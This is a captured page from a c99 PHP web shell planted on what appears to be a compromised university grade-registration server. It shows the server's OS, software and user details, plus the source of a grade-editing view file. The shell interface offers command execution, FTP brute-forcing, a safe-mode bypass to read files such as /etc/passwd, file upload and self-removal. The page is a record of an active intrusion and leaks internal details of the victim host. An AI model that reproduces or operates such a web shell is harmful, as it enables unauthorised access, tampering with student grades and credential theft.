!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_showCourseEditGrade.php (2.17 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script language="JavaScript1.2">
function changeCur(seed){
    var acY, tmId;
    acY = document.getElementById("acY").value;
    tmId = document.getElementById("tmId").value;

    var url = "<?php echo site_url($this->config->item('rg_folder'));?>"+"/grade/showCrs_editGrd/"+acY+"/"+tmId+"/"+seed;

    xmlhttp = newXmlHttp();
    xmlhttp.open("GET", url, false);
    xmlhttp.send(null); 
    if(xmlhttp.readyState==4 && xmlhttp.status==200){
        var ret_text = xmlhttp.responseText;
        //alert(ret_text);
        document.getElementById('showCrs').innerHTML= ret_text;
    }
}
</script>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
        <td>
            <table width="100%" border="0">
                <tr>
                    <td colspan="12" align="center"><span class="h error"><b>แก้เกรด</b></span></td>
                    <td></td>
                </tr>
                <tr>
                    <td height="22" colspan="8"></td>
                </tr>
                <tr>
                    <td height="22" colspan="8" width=""><font size="2"><b>ปีการศึกษา</b>
<?php
                    $js1 
'id="acY" onChange="changeCur('.mt_rand().')"';
                    echo 
form_dropdown('acY'$rs_tmc$acY$js1);
?>
                    <b>ภาคการศึกษา</b>
<?php
                    $js2 
'id="tmId" onChange="changeCur('.mt_rand().')"';
                    echo 
form_dropdown('tmId'$rs_tm$tmId$js2);
?>
                    </font></td>
                </tr>
            </table>
            <div id='showCrs'></div>
        <br></td>
    </tr>
    <tr>
        <td><table width="100%">
            <tr>
                <td width="10%"><font size="2" color="<?php echo $font_color_err?>"><b>หมายเหตุ : </b></font></td>
                <td><img src="<?php echo base_url().$this->config->item("rg_edit_yell");?>" width="23" height="19" align="absmiddle" border="0">
                <font size="2" color="<?php echo $font_color_err?>"> ยังไม่ส่งเกรด</font></td>
            </tr>
            <tr>
                <td height="22"></td>
                <td><img src="<?php echo base_url().$this->config->item("rg_edit");?>" width="23" height="19" align="absmiddle" border="0">
                <font size="2" color="<?php echo $font_color_err?>"> ส่งเกรดแล้ว</font></td>
            </tr>
        </table></td>
    </tr>
</table>
<script language="JavaScript">
changeCur('<?php echo mt_rand();?>');
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--